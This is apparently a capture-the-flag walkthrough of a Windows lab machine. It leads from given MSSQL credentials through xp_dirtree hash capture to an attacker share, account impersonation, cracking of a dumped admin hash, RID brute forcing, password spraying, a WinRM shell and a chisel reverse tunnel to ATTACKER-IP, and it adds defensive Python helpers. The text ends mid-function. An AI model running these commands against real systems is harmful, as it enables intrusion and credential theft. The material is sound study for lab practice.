Machine Info

Eighteen is an easy Windows machine… As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!

Host / IP

10.10.11.95 / EIGHTEEN.HTB. We add the record to our /etc/hosts.

User

Reconnaissance

We are going to start by running our nmap scan:

└─$ sudo nmap -sC -sV eighteen.htb -T4 -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-09 20:00 CET
Nmap scan report for eighteen.htb (10.10.11.95)
Host is up (0.066s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Welcome - eighteen.htb
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.95:1433: 
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-10T01:54:54
|_Not valid after:  2056-01-10T01:54:54
| ms-sql-info: 
|   10.10.11.95:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-01-10T02:01:15+00:00; +7h00m00s from scanner time.
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.28 seconds

We see a web port open, MSSQL and WinRM. Let’s visit the web page.

Website

└─$ ffuf -u http://eighteen.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r  
________________________________________________
admin                   [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 228ms]
dashboard               [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 102ms]
features                [Status: 200, Size: 2822, Words: 849, Lines: 88, Duration: 275ms]
login                   [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 92ms]
logout                  [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 111ms]
register                [Status: 200, Size: 2421, Words: 762, Lines: 76, Duration: 306ms]
:: Progress: [20481/20481] :: Job [1/1] :: 591 req/sec :: Duration: [0:00:47] :: Errors: 0 ::

This website lets us create users and log in. The credentials we were given do not work on the website, so let's try MSSQL.

MSSQL

└─$ impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@eighteen.htb       
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (kevin  guest@master)> select @@version;
                                                                                                                                                                                                                                            
Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) 
        Oct  8 2022 05:58:25 
        Copyright (C) 2022 Microsoft Corporation
        Enterprise Evaluation Edition (64-bit) on Windows Server 2025 Datacenter 10.0 <X64> (Build 26100: ) (Hypervisor)
   

SQL (kevin  guest@master)> select name from sys.databases;
name                

master              

tempdb              

model               

msdb                

financial_planner   

SQL (kevin  guest@master)> select * from financial_planner.information_schema.tables;
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
SQL (kevin  guest@master)> 

We see that the credentials kevin:iNa2we6haRj2gaw! belong to a local SQL login. As we can see, though, our functionality is limited and we cannot access the financial_planner DB.

Let’s enumerate the database more.

SELECT name, type_desc, is_disabled FROM sys.server_principals;
name                                  type_desc     is_disabled   
-----------------------------------   -----------   -----------   
sa                                    SQL_LOGIN               0   

public                                SERVER_ROLE             0   

sysadmin                              SERVER_ROLE             0   

securityadmin                         SERVER_ROLE             0   

serveradmin                           SERVER_ROLE             0   

setupadmin                            SERVER_ROLE             0   

processadmin                          SERVER_ROLE             0   

diskadmin                             SERVER_ROLE             0   

dbcreator                             SERVER_ROLE             0   

bulkadmin                             SERVER_ROLE             0   

##MS_ServerStateReader##              SERVER_ROLE             0   

##MS_ServerStateManager##             SERVER_ROLE             0   

##MS_DefinitionReader##               SERVER_ROLE             0   

##MS_DatabaseConnector##              SERVER_ROLE             0   

##MS_DatabaseManager##                SERVER_ROLE             0   

##MS_LoginManager##                   SERVER_ROLE             0   

##MS_SecurityDefinitionReader##       SERVER_ROLE             0   

##MS_PerformanceDefinitionReader##    SERVER_ROLE             0   

##MS_ServerSecurityStateReader##      SERVER_ROLE             0   

##MS_ServerPerformanceStateReader##   SERVER_ROLE             0   

kevin                                 SQL_LOGIN               0   

appdev                                SQL_LOGIN               0 

Here we try to attack the MSSQL service by obtaining the NTLMv2 hash of its service account through xp_dirtree. We set up responder for this as well, and it works: we get the hash. We couldn't crack it, though, which means the password is not an easy one.

EXEC xp_dirtree '\\[ATTACKER-IP]\share';
subdirectory   depth   
   
SQL (kevin  guest@master)> 

Info
This is an easy and very useful attack in many scenarios when dealing with Windows services. responder is a multi-listener tool that listens for all sorts of different protocols at the same time. Here we use an MSSQL stored procedure to traverse a remote share (SMB); the service account running MSSQL authenticates to our share, which is how we get its NTLMv2 hash.
└─$ sudo responder -I tun0


[SMB] NTLMv2-SSP Client   : 10.10.11.95
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::EIGHTEEN:f2cc69a6c10e894f [hash truncated]

We should continue enumerating the database, but it also makes sense to look at the web page more: its pages, endpoints, etc. We check the Login and Register pages for SQL injection by trying to make them throw errors, and do the same for the other endpoints after registering a user. The app seems solid, except that it throws 500 server errors.

What we did find is an error coming from MSSQL when we try to register a user with an existing username, and from it we learned that an admin user already exists!

We continue with our MSSQL enumeration now.

SQL (kevin  guest@master)> select distinct b.name from sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
name     
   
appdev   

SQL (kevin  guest@master)> 

With the above query we can see which impersonation rights our login has: we can impersonate the login appdev. Below is a tool we can also use for MSSQL enumeration and more; we give it a go as a double check.

└─$ mssqlpwner kevin:'iNa2we6haRj2gaw!'@10.10.11.95 enumerate
[*] Connecting to 10.10.11.95:1433 as kevin
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[*] Discovered hostname: DC01
[*] Discovered server principal: appdev on DC01 (kevin@master/guest)
[*] Server information from DC01 (kevin@master/guest) is retrieved
[*] Server information from DC01 (kevin>I:appdev@master/guest) is retrieved
[*] Done!
[*] Enumeration completed successfully
[*] Saving state to file
[*] Linkable servers:
[*] Linked Server Name: DC01
[*] Chain: DC01 (kevin@master/guest)
[*] Hostname: DC01
[*] Chain ID: 8709b586-aa81-4f1b-a16a-cefe2170a88e
[*] Database User: guest
[*] Database Name: master
[*] Server User: kevin
[*] Instance Name: MSSQLSERVER
[*] Version: Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) 
        Oct  8 2022 05:58:25 
        Copyright (C) 2022 Microsoft Corporation
        Enterprise Evaluation Edition (64-bit) on Windows Server 2025 Datacenter 10.0 <X64> (Build 26100: ) (Hypervisor)
[*] Domain Name: EIGHTEEN
[*] Our user can impersonate these server principals: appdev
[*] These databases are trustworthy: msdb
[*] These databases are available: financial_planner
[*] --------------------------------------------------
[*] Linked Server Name: DC01
[*] Chain: DC01 (kevin>I:appdev@master/guest)
[*] Hostname: DC01
[*] Chain ID: fe6488c8-730c-4b68-bf94-53d6d565dd5f
[*] Database User: appdev
[*] Database Name: master
[*] Server User: appdev
[*] Instance Name: MSSQLSERVER
[*] Version: Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) 
        Oct  8 2022 05:58:25 
        Copyright (C) 2022 Microsoft Corporation
        Enterprise Evaluation Edition (64-bit) on Windows Server 2025 Datacenter 10.0 <X64> (Build 26100: ) (Hypervisor)
[*] Domain Name: EIGHTEEN
[*] Our user can impersonate these server principals: appdev
[*] These databases are trustworthy: msdb
[*] These databases are available: financial_planner
[*] --------------------------------------------------
[*] Nothing to revert

We impersonate appdev with the statement below and then continue into the financial_planner DB.

EXECUTE AS LOGIN = 'appdev'; 

select table_name from financial_planner.information_schema.tables;
table_name    
 
users         

incomes       

expenses      

allocations   

analytics     

visits        

SQL (appdev  appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.


SQL (appdev  appdev@financial_planner)> select * from users;
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at   
 
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03   

SQL (appdev  appdev@financial_planner)>

We manage to get the administrator's hash from the database. Now we need to crack it in order to use it elsewhere.

Important

Finding the correct hash mode is important for hashcat, as is putting the above hash into the accepted format; the example hashes on the official site help with that. The hash needs to be converted from hex to Base64 and its prefix changed slightly to match the accepted format.

└─$ cat admin.hash
pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
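To see exactly what that conversion does, and to check it, here is a small Python helper. It is added to this writeup and is not code from the box or from the app. It assumes the stored hash is in Werkzeug's generate_password_hash format, pbkdf2:sha256:<iterations>$<salt>$<hexdigest>, and that hashcat mode 10000 expects Django's pbkdf2_sha256$<iterations>$<salt>$<base64digest>. Both are PBKDF2-HMAC-SHA256 over the same salt and iteration count, so only the digest encoding changes; the verify_* functions show that one password validates under both encodings. The password and salt used for the self-check are made up here.

```python
import base64
import hashlib
import hmac

# Constructed input: the hash exactly as it appears in financial_planner.users above.
WERKZEUG_HASH = (
    "pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$"
    "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"
)


def parse_werkzeug(h: str):
    """Split 'pbkdf2:<algo>:<iterations>$<salt>$<hexdigest>' into its parts."""
    method, salt, hexdigest = h.split("$", 2)
    scheme, algo, iterations = method.split(":")
    if scheme != "pbkdf2":
        raise ValueError(f"unsupported scheme: {scheme}")
    return algo, int(iterations), salt, bytes.fromhex(hexdigest)


def werkzeug_to_django(h: str) -> str:
    """Re-encode the same digest as Django's 'pbkdf2_<algo>$<iterations>$<salt>$<base64>'.

    The salt stays a literal string and the iteration count is unchanged; only the
    hex digest becomes base64, which is the edit the page describes by hand."""
    algo, iterations, salt, digest = parse_werkzeug(h)
    b64 = base64.b64encode(digest).decode("ascii")
    return f"pbkdf2_{algo}${iterations}${salt}${b64}"


def make_werkzeug(password: str, salt: str, iterations: int, algo: str = "sha256") -> str:
    """Produce a Werkzeug-style hash (used here only for the self-check)."""
    digest = hashlib.pbkdf2_hmac(algo, password.encode(), salt.encode(), iterations)
    return f"pbkdf2:{algo}:{iterations}${salt}${digest.hex()}"


def verify_werkzeug(password: str, h: str) -> bool:
    """Constant-time check of a password against a Werkzeug PBKDF2 hash."""
    algo, iterations, salt, digest = parse_werkzeug(h)
    candidate = hashlib.pbkdf2_hmac(algo, password.encode(), salt.encode(), iterations)
    return hmac.compare_digest(candidate, digest)


def verify_django(password: str, h: str) -> bool:
    """Same check against the Django encoding, proving the two formats carry one digest."""
    algo_tag, iterations, salt, b64 = h.split("$", 3)
    algo = algo_tag.split("_", 1)[1]
    candidate = hashlib.pbkdf2_hmac(algo, password.encode(), salt.encode(), int(iterations))
    return hmac.compare_digest(candidate, base64.b64decode(b64))


if __name__ == "__main__":
    print(werkzeug_to_django(WERKZEUG_HASH))
```

The 600,000 iterations stay in the converted string, which is why hashcat's rate on this hash is in the low thousands per second; a login check should use hmac.compare_digest as the verify functions do.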

Now let’s use hashcat to crack it with the correct hashmode.

Admin's password
└─$ hashcat -m 10000 admin.hash /usr/share/wordlists/rockyou.txt.gz


pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10000 (Django (PBKDF2-SHA256))
Hash.Target......: pbkdf2_sha256$600000$AMtzteQIG7yAbZIa$BnOtkKC0r7GdZ...yIcTM=
Time.Started.....: Sat Jan 10 15:15:44 2026 (26 secs)
Time.Estimated...: Sat Jan 10 15:16:10 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:     1599 H/s (10.69ms) @ Accel:4 Loops:250 Thr:512 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 40960/14344385 (0.29%)
Rejected.........: 0/40960 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599750-599999
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> loserface1
Hardware.Mon.#01.: Temp: 60c Util:100% Core:1860MHz Mem:6000MHz Bus:8

Started: Sat Jan 10 15:15:37 2026
Stopped: Sat Jan 10 15:16:11 2026

We have successfully cracked the hash and used it on the website.

The problem, though, is that we don't get anything from it. Trying to authenticate over WinRM to the DC with various usernames (kevin or admin) didn't work, and even username-spraying attempts didn't bring much.

Tip
What if there were a way to enumerate the local principals with the MSSQL credentials we have? Well, actually there is. We can enumerate the RIDs of a Windows host through MSSQL and find out what we are looking for. We will use nxc for this.
Info
NetExec (often abbreviated as nxc) is a powerful, open-source network exploitation tool designed to automate security assessments of large networks, with a strong focus on Active Directory (AD) environments.

└─$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
MSSQL       10.10.11.95     1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.10.11.95     1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 
MSSQL       10.10.11.95     1433   DC01             498: EIGHTEEN\Enterprise Read-only Domain Controllers                                                                                 
MSSQL       10.10.11.95     1433   DC01             500: EIGHTEEN\Administrator
MSSQL       10.10.11.95     1433   DC01             501: EIGHTEEN\Guest
MSSQL       10.10.11.95     1433   DC01             502: EIGHTEEN\krbtgt
MSSQL       10.10.11.95     1433   DC01             512: EIGHTEEN\Domain Admins
MSSQL       10.10.11.95     1433   DC01             513: EIGHTEEN\Domain Users
MSSQL       10.10.11.95     1433   DC01             514: EIGHTEEN\Domain Guests
MSSQL       10.10.11.95     1433   DC01             515: EIGHTEEN\Domain Computers
MSSQL       10.10.11.95     1433   DC01             516: EIGHTEEN\Domain Controllers
MSSQL       10.10.11.95     1433   DC01             517: EIGHTEEN\Cert Publishers
MSSQL       10.10.11.95     1433   DC01             518: EIGHTEEN\Schema Admins
MSSQL       10.10.11.95     1433   DC01             519: EIGHTEEN\Enterprise Admins
MSSQL       10.10.11.95     1433   DC01             520: EIGHTEEN\Group Policy Creator Owners
MSSQL       10.10.11.95     1433   DC01             521: EIGHTEEN\Read-only Domain Controllers                                                                                            
MSSQL       10.10.11.95     1433   DC01             522: EIGHTEEN\Cloneable Domain Controllers                                                                                            
MSSQL       10.10.11.95     1433   DC01             525: EIGHTEEN\Protected Users
MSSQL       10.10.11.95     1433   DC01             526: EIGHTEEN\Key Admins
MSSQL       10.10.11.95     1433   DC01             527: EIGHTEEN\Enterprise Key Admins
MSSQL       10.10.11.95     1433   DC01             528: EIGHTEEN\Forest Trust Accounts
MSSQL       10.10.11.95     1433   DC01             529: EIGHTEEN\External Trust Accounts
MSSQL       10.10.11.95     1433   DC01             553: EIGHTEEN\RAS and IAS Servers
MSSQL       10.10.11.95     1433   DC01             571: EIGHTEEN\Allowed RODC Password Replication Group                                                                                 
MSSQL       10.10.11.95     1433   DC01             572: EIGHTEEN\Denied RODC Password Replication Group                                                                                  
MSSQL       10.10.11.95     1433   DC01             1000: EIGHTEEN\DC01$
MSSQL       10.10.11.95     1433   DC01             1101: EIGHTEEN\DnsAdmins
MSSQL       10.10.11.95     1433   DC01             1102: EIGHTEEN\DnsUpdateProxy
MSSQL       10.10.11.95     1433   DC01             1601: EIGHTEEN\mssqlsvc
MSSQL       10.10.11.95     1433   DC01             1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01                                                                                       
MSSQL       10.10.11.95     1433   DC01             1603: EIGHTEEN\HR
MSSQL       10.10.11.95     1433   DC01             1604: EIGHTEEN\IT
MSSQL       10.10.11.95     1433   DC01             1605: EIGHTEEN\Finance
MSSQL       10.10.11.95     1433   DC01             1606: EIGHTEEN\jamie.dunn
MSSQL       10.10.11.95     1433   DC01             1607: EIGHTEEN\jane.smith
MSSQL       10.10.11.95     1433   DC01             1608: EIGHTEEN\alice.jones
MSSQL       10.10.11.95     1433   DC01             1609: EIGHTEEN\adam.scott
MSSQL       10.10.11.95     1433   DC01             1610: EIGHTEEN\bob.brown
MSSQL       10.10.11.95     1433   DC01             1611: EIGHTEEN\carol.white
MSSQL       10.10.11.95     1433   DC01             1612: EIGHTEEN\dave.green
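What --rid-brute does underneath, and what a defender would therefore see in SQL Server Audit, is shown by the added Python example below (mine, not nxc's code). It assumes, as I believe nxc's MSSQL module does, that each RID is resolved with SUSER_SNAME() over a binary SID built from the domain SID and the candidate RID; the domain SID is the one that appears in the whoami /groups output later on this page, and the audit rows are constructed here in a simplified (login, statement) shape.

```python
import re
import struct
from collections import defaultdict

# Domain SID taken from the whoami /groups output on this page (EIGHTEEN\IT is ...-1604).
DOMAIN_SID = "S-1-5-21-1152179935-589108180-1989892463"


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-<authority>-<sub>...' into the binary layout Windows uses:
    revision byte, sub-authority count, 48-bit big-endian identifier authority,
    then each sub-authority as a little-endian 32-bit integer."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a revision-1 SID: {sid}")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if not 1 <= len(subs) <= 15:
        raise ValueError("SID must have 1..15 sub-authorities")
    header = bytes([1, len(subs)]) + authority.to_bytes(6, "big")
    return header + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(raw: bytes) -> str:
    """Inverse of sid_to_bytes, with a length check so junk is rejected."""
    revision, count = raw[0], raw[1]
    if revision != 1 or len(raw) != 8 + 4 * count:
        raise ValueError("malformed binary SID")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack(f"<{count}I", raw[8:])
    return "S-1-" + "-".join(str(x) for x in (authority, *subs))


def rid_lookup_query(domain_sid: str, rid: int) -> str:
    """One RID resolution as T-SQL; SUSER_SNAME() accepts the binary SID as a hex literal."""
    return f"SELECT SUSER_SNAME(0x{sid_to_bytes(f'{domain_sid}-{rid}').hex()});"


# Constructed audit sample: kevin walks a RID range, appdev does normal work plus one lookup.
AUDIT_SAMPLE = [("kevin", rid_lookup_query(DOMAIN_SID, rid)) for rid in range(498, 530)] + [
    ("appdev", "SELECT * FROM financial_planner.dbo.users;"),
    ("appdev", rid_lookup_query(DOMAIN_SID, 1604)),
]

_SUSER_SNAME_HEX = re.compile(r"SUSER_SNAME\s*\(\s*0x([0-9a-fA-F]+)\s*\)", re.IGNORECASE)


def detect_rid_sweep(audit_rows, threshold: int = 20) -> dict:
    """Return {login: sorted RIDs} for every login that resolved at least `threshold`
    distinct RIDs under one domain SID: the footprint a RID sweep leaves in the audit log."""
    seen = defaultdict(set)
    for login, statement in audit_rows:
        for hex_sid in _SUSER_SNAME_HEX.findall(statement):
            try:
                sid = bytes_to_sid(bytes.fromhex(hex_sid))
            except ValueError:
                continue  # not a SID we can decode; ignore
            domain, rid = sid.rsplit("-", 1)
            seen[(login, domain)].add(int(rid))
    return {login: sorted(rids) for (login, _), rids in seen.items() if len(rids) >= threshold}


if __name__ == "__main__":
    for login, rids in detect_rid_sweep(AUDIT_SAMPLE).items():
        print(f"{login}: {len(rids)} RIDs resolved, {rids[0]}..{rids[-1]}")
```

The threshold is the tunable: a single SUSER_SNAME call is routine, but dozens of consecutive RIDs from one low-privileged login within a short window is not, and that is the event worth alerting on.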

Bingo, we got a ton of information. We save these usernames in a users.txt so we can do a spray attack and have them for reference. We will use CrackMapExec to perform our attack and find which of these can authenticate to the Windows DC with the known password.

└─$ crackmapexec winrm 10.10.11.95 -u users.txt  -p 'iloveyou1'


SMB         10.10.11.95     5985   NONE             [*] None (name:10.10.11.95) (domain:None)
HTTP        10.10.11.95     5985   NONE             [*] http://10.10.11.95:5985/wsman

WINRM       10.10.11.95     5985   NONE             [-] EIGHTEEN\jamie.dunn:iloveyou1
WINRM       10.10.11.95     5985   NONE             [-] EIGHTEEN\jane.smith:iloveyou1
WINRM       10.10.11.95     5985   NONE             [-] EIGHTEEN\alice.jones:iloveyou1
WINRM       10.10.11.95     5985   NONE             [+] EIGHTEEN\adam.scott:iloveyou1 (Pwn3d!)                        

So that’s how we get the user flag.

Evil-WinRM usage
└─$ evil-winrm -i 10.10.11.95 -u 'EIGHTEEN\adam.scott' -p 'iloveyou1'
                                        
Evil-WinRM shell v3.7

*Evil-WinRM* PS C:\Users\adam.scott\Documents> ls ..\Desktop

    Directory: C:\Users\adam.scott\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         1/11/2026   7:38 PM             34 user.txt

Root

One thing that generally helps in enumeration and with our tooling is to expose all the internal ports and networks. We can create a reverse dynamic tunnel and have all the internal services reachable from our attacker host. Even though in our case it is only moderately helpful, it's still good practice. On the Windows DC we don't see SSH.exe, so we can use Chisel for that.

Info
Chisel is an HTTP tunneling tool that encapsulates our data stream within HTTP. It also uses the SSH protocol within the tunnel so our data will be encrypted.

Attacker/Kali host.

└─$ chisel server --port 8081 --reverse
2026/01/12 13:47:52 server: Reverse tunnelling enabled
2026/01/12 13:47:52 server: Listening on http://0.0.0.0:8081
2026/01/12 13:50:09 server: session#1: Client version (1.11.3) differs from server version (1.11.3-0kali1)
2026/01/12 13:50:09 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

And from the victim host.

*Evil-WinRM* PS C:\Users\adam.scott> .\chisel.exe client ATTACKER-IP:8081 R:socks
chisel.exe : 2026/01/12 11:50:09 client: Connecting to ws://ATTACKER-IP:8081
    + CategoryInfo          : NotSpecified: (2026/01/12 11:5..:8081:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2026/01/12 11:50:09 client: Connected (Latency 39.7108ms)

Enumeration


*Evil-WinRM* PS C:\Users\adam.scott> net user /domain

User accounts for \\


adam.scott               Administrator            alice.jones
bob.brown                carol.white              dave.green
Guest                    jamie.dunn               jane.smith
krbtgt                   mssqlsvc
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\adam.scott> whoami /groups

GROUP INFORMATION


Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
EIGHTEEN\IT                                Group            S-1-5-21-1152179935-589108180-1989892463-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
*Evil-WinRM* PS C:\Users\adam.scott> whoami /priv

PRIVILEGES INFORMATION


Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We have done some basic checks on the user and its privileges. Our target seems to be the Administrator user, but we can get a better idea of how to get there with BloodHound. First we collect the AD data with SharpHound and then we import it into our local BloodHound instance.

Info
We skip the part where we transfer SharpHound.ps1, import it, run it and then transfer the .zip file back to our attacker host. Artifacts can be transferred from attacker to victim by spinning up a web server (python -m http.server 80) and using iwr from the Windows victim host; the opposite direction works by running an SMB server on the attacker (impacket-smbserver) and mounting that share from the Windows host.

BloodHound revealed interesting things about our user: it is part of the IT group. We continued looking at all the important "must-check" items but didn't find anything interesting. We even imported PowerView and enumerated the AD a bit more, but nothing popped.

Then we started looking online, based on our Windows version.

*Evil-WinRM* PS C:\Users\adam.scott\Documents> Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion

dnshostname       operatingsystem                operatingsystemversion
-----------       ---------------                ----------------------
DC01.eighteen.htb Windows Server 2025 Datacenter 10.0 (26100)

*Evil-WinRM* PS C:\Users\adam.scott\Documents> $cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'; "$($cv.CurrentBuild).$($cv.UBR)"
26100.4349

For that specific Windows build there were tons of CVEs and potentially exploitable vulnerabilities. We went back to AD enumeration to see whether we had missed something, and with PowerView we check for interesting ACLs.

*Evil-WinRM* PS C:\Users\adam.scott\Documents> Find-InterestingDomainAcl

...
ObjectDN                : OU=Staff,DC=eighteen,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1152179935-589108180-1989892463-1604
IdentityReferenceName   : IT
IdentityReferenceDomain : eighteen.htb
IdentityReferenceDN     : CN=IT,OU=Staff,DC=eighteen,DC=htb
IdentityReferenceClass  : group
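Here is the audit check I would run over the full Find-InterestingDomainAcl output to list every OU where a non-privileged principal can create child objects, which is the condition the next section builds on. It is an added helper, not PowerView's code. The sample reuses the record above and adds two constructed records (a Domain Admins ACE on the same OU and an ACE on a user object) to show which entries are ignored; it assumes that domain RIDs below 1000 are built-in or privileged accounts and that GenericAll implies CreateChild.

```python
# Constructed sample in the "Key : Value" block format Find-InterestingDomainAcl prints.
SAMPLE_OUTPUT = """
ObjectDN                : OU=Staff,DC=eighteen,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1152179935-589108180-1989892463-1604
IdentityReferenceName   : IT
IdentityReferenceDomain : eighteen.htb
IdentityReferenceDN     : CN=IT,OU=Staff,DC=eighteen,DC=htb
IdentityReferenceClass  : group

ObjectDN                : OU=Staff,DC=eighteen,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
SecurityIdentifier      : S-1-5-21-1152179935-589108180-1989892463-512
IdentityReferenceName   : Domain Admins
IdentityReferenceClass  : group

ObjectDN                : CN=jane.smith,OU=Staff,DC=eighteen,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild, WriteProperty
ObjectAceType           : None
SecurityIdentifier      : S-1-5-21-1152179935-589108180-1989892463-1604
IdentityReferenceName   : IT
IdentityReferenceClass  : group
"""

# Rights that let a principal add objects under an OU (GenericAll includes CreateChild).
CHILD_CREATING_RIGHTS = {"CreateChild", "GenericAll"}


def parse_powerview_records(text: str) -> list:
    """Turn blank-line-separated 'Key : Value' blocks into a list of dicts."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def is_builtin_or_privileged_rid(sid: str) -> bool:
    """Well-known RIDs sit below 1000 (500 Administrator, 512 Domain Admins, ...);
    assumption used here to separate expected admin ACEs from ones to review."""
    try:
        return int(sid.rsplit("-", 1)[1]) < 1000
    except ValueError:
        return True  # not a numeric RID; treat as built-in rather than flag it


def find_ou_child_creators(records: list) -> list:
    """Flag ACEs where a non-privileged principal may create children of an OU."""
    findings = []
    for r in records:
        dn = r.get("ObjectDN", "")
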